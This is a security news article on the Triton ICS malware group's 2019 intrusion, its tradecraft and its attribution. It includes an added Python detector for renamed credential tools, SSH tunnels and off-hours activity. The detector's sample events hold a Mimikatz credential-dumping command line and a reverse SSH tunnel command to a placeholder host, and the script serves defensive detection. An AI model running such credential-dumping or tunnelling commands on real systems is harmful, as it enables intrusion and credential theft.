Triton Active Once More

Recently published research by FireEye indicates that the hackers behind the Triton malware are active once more. The group rose to public attention in 2017 when the malware was used to target a petrochemical plant in Saudi Arabia. According to research conducted by Symantec, that attack is believed to have been intended to cause physical damage at the industrial site. It came close to doing so, but Triton's manipulation of the plant's safety instrumented systems (SIS) instead tripped them into a fail-safe state, which inadvertently shut the plant down.

Triton, sometimes referred to as Trisis, was specifically engineered to target one type of industrial control system (ICS): the Triconex safety instrumented system (SIS) controllers developed by Schneider Electric. The malware is named after the safety system it targets. Triton is unusual in that it homes in on the safety layer itself: tampering with SIS logic can disable the protections that keep a process within safe limits, which could result in damage to industrial equipment. Malware built for such a purpose is rare and accounts for only a handful of the threats on the current landscape. Previously seen examples include Stuxnet and Industroyer, the latter being a highly modular piece of malware that can be equipped to suit the attacker's needs. Stuxnet targeted the centrifuges of an Iranian uranium enrichment facility, while Industroyer targeted electrical grid infrastructure in Ukraine.

Returning to Triton, it would seem that the failed attempt on the Saudi petrochemical plant did not deter the group operating the malware. On April 10, 2019, FireEye revealed that a second, as yet unnamed, company had been compromised by the same group. The company is described by the firm as a "critical infrastructure facility", and the operators of Triton were present on its systems for approximately a year. While FireEye has remained tight-lipped on certain details, it has revealed some key points concerning the group's infiltration tactics. The first step of the attack is gaining a foothold on the corporate side of the network, since the corporate side is seen as potentially more vulnerable. Once this is achieved, the hackers look to gain access to the industrial side. Their low profile helps here: they do not steal data, take screenshots, or use any form of keylogger, so there is little of the noise that would normally reveal an intrusion.


The hackers then move laterally across the network. To do this they must remain undetected while performing the network reconnaissance needed to work out how to penetrate the industrial side of the target company, and they use a mix of generic and custom tools. Their tool usage is also unusual in that they switch between tools to evade antivirus packages and other security measures. An example given by the researchers describes the use of several custom backdoors, with the choice of backdoor depending on which network was being targeted. The group also uses Mimikatz, a public tool, and SecHack, a custom tool, to harvest credentials. These are used in combination with renamed files that appear legitimate, web shells, and SSH tunnels to carry out activity covertly and to drop additional tools.

Only once the hackers have gained access to the SIS controllers do they deploy the Triton malware. SIS, or safety instrumented system, controllers are engineered sets of hardware and software used to monitor critical processes and bring them to a safe state when they leave the limits regarded as safe. They provide protection such as: high fuel gas pressure initiates action to close the main fuel gas valve; high reactor temperature initiates action to open a cooling media valve; and high distillation column pressure initiates action to open a pressure vent valve. Any tampering with the software controlling such hardware can result in serious safety concerns and plant shutdowns.

Further assisting the hackers' overall plans is that they are only active on the network outside working hours. In the case investigated by FireEye, the hackers also gained access to the victim's distributed control system (DCS), which would have provided information on plant operations and processes. However, the group ignored this and focused solely on the SIS controller. While the Triton malware itself is not believed to have been deployed on this victim's systems, finding traces of the group behind such a dangerous malware is a serious cause for concern and certainly warrants the attention given to it by the researchers involved.
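The tradecraft described in the two paragraphs above (a known credential tool running under a renamed file, SSH tunnels for covert access, and activity concentrated outside working hours) is exactly what a defender would want to hunt for in process-creation telemetry. The following is an added example written for this page, not code from the article or from FireEye's report: a toy scoring detector run over constructed log lines. The log format, host names, hashes (all-'a', all-'b' placeholders), command lines and working-hours window are all assumptions for the example, not values from the actual intrusion.

```python
"""Toy detection logic for three Triton-operator tradecraft points:
renamed known tools, SSH tunnels and off-hours activity.
Added example; all events, hashes and names are constructed."""
from dataclasses import dataclass
from datetime import datetime, time

# Placeholder hashes; a real deployment would carry the SHA-256 values of
# the tool builds recovered from the intrusion.
KNOWN_TOOL_HASHES = {
    "a" * 64: "mimikatz",
    "b" * 64: "sechack",   # custom tool named in FireEye's reporting
}
# File names under which each tool would NOT count as renamed (assumption).
EXPECTED_NAMES = {"mimikatz": {"mimikatz.exe"}, "sechack": {"sechack.exe"}}

# Local working hours (assumption); anything outside counts as off-hours.
WORK_START, WORK_END = time(7, 0), time(19, 0)
ALERT_THRESHOLD = 2


@dataclass
class Event:
    ts: datetime
    host: str
    image: str      # full path of the executed file
    sha256: str
    cmdline: str


def parse_event(line: str) -> Event:
    """Constructed format: ISO timestamp|host|image path|sha256|command line."""
    ts, host, image, sha, cmd = line.split("|", 4)
    return Event(datetime.fromisoformat(ts), host, image, sha.lower(), cmd)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def renamed_tool(ev: Event):
    """Return the tool name if a known tool hash runs under an unexpected name."""
    tool = KNOWN_TOOL_HASHES.get(ev.sha256)
    if tool and basename(ev.image) not in EXPECTED_NAMES[tool]:
        return tool
    return None


def is_ssh_tunnel(cmdline: str) -> bool:
    """ssh/plink invoked with a port-forwarding flag (-L, -R or -D)."""
    toks = cmdline.split()
    if not toks or basename(toks[0]) not in {"ssh", "ssh.exe", "plink.exe"}:
        return False
    return any(t in {"-L", "-R", "-D"} for t in toks[1:])


def is_off_hours(ts: datetime) -> bool:
    return ts.weekday() >= 5 or not (WORK_START <= ts.time() < WORK_END)


def score_event(ev: Event):
    """Weighted indicators: off-hours alone never alerts, it only raises priority."""
    score, reasons = 0, []
    tool = renamed_tool(ev)
    if tool:
        score += 3
        reasons.append(f"{tool} running as {basename(ev.image)}")
    if is_ssh_tunnel(ev.cmdline):
        score += 2
        reasons.append("ssh tunnel")
    if is_off_hours(ev.ts):
        score += 1
        reasons.append("off-hours")
    return score, reasons


def analyse(lines):
    """Return (host, timestamp, score, reasons) for events at or above threshold."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            findings.append((ev.host, ev.ts.isoformat(), score, reasons))
    return findings


# Constructed process-creation events (2019-04-10 is a Wednesday).
SAMPLE_LINES = [
    "2019-04-10T02:15:00|eng-ws01|C:\\Windows\\Temp\\svchost32.exe|" + "a" * 64
    + "|svchost32.exe privilege::debug sekurlsa::logonpasswords",
    "2019-04-10T10:05:00|eng-ws01|C:\\Tools\\mimikatz.exe|" + "a" * 64
    + "|mimikatz.exe coffee",
    "2019-04-10T23:40:00|jump01|/usr/bin/ssh|" + "c" * 64
    + "|ssh -N -R 2222:10.0.5.20:22 ops@203.0.113.7",
    "2019-04-10T09:00:00|fs01|C:\\Windows\\System32\\svchost.exe|" + "d" * 64
    + "|svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for host, ts, score, reasons in analyse(SAMPLE_LINES):
        print(host, ts, score, "; ".join(reasons))
```

Of the four constructed events, only the renamed Mimikatz run at 02:15 and the night-time reverse SSH tunnel cross the threshold; the daytime Mimikatz run under its own name and the genuine svchost.exe do not. Matching on file hash rather than file name is the point of the first check: renaming the binary, as the group did, changes nothing about its hash.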

Who Operates Triton?

Towards the end of 2018 FireEye attributed the use of Triton to a group in Russia, which it tracks as TEMP.Veles. With high confidence, the security firm assessed that the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a government-owned technical research institution located in Moscow, was involved in these attacks. It is important to note that FireEye's report does not link the Triton malware itself to CNIIHM, but rather the secondary malware used by TEMP.Veles during the incidents in which Triton was deployed. These secondary tools, used to aid the deployment of the main Triton payloads, contained enough artifacts for researchers to identify their source.

Based on CNIIHM's self-described mission and other public information, researchers believe the institute had not only the tools and expertise to develop this type of malware, including Triton itself, but also the motive, because of its ties to various Russian military and critical infrastructure bodies. However, some InfoSec experts have attributed the Triton malware to operators in Iran, largely on the basis of the geopolitical situation between Iran and Saudi Arabia and because a reason for a Russian group to target a Saudi facility has yet to be established.


About the author:

Karolis Liucveikis

Karolis Liucveikis - experienced software engineer, passionate about behavioral analysis of malicious apps.

Author and general operator of PCrisk's "Removal Guides" section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has over five years of experience in this field. He attended KTU University and graduated with a degree in Software Development in 2017. Extremely passionate about the technical aspects and behavior of various malicious applications.
